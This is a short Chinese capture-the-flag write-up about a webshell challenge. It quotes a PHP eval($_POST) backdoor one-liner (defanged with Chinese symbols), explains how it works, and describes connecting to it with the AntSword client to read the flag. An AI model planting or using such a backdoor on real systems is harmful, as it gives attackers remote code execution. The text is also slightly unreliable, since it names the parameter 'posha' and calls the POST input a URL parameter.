第十题 webshell
一开始告知电脑里有一个php是这样的:《?php @eval($_POST[‘shell’])》(防止php运行所以改成了中文符号)
查了一下,感觉这个解释最好:
这是一个典型的后门程序,首先我解释一下eval函数的作用,
//eval — 把字符串作为PHP代码执行
eval(‘echo 123;’);//输出123
也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘shell’]的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等。
所以意思就是在url上加/?shell=xxxx(指令)就可以执行
所以直接打开中国蚁剑
复制网址
链接密码写shell(相当于传值时的形参)
发现flag.txt文件,打开,得到flag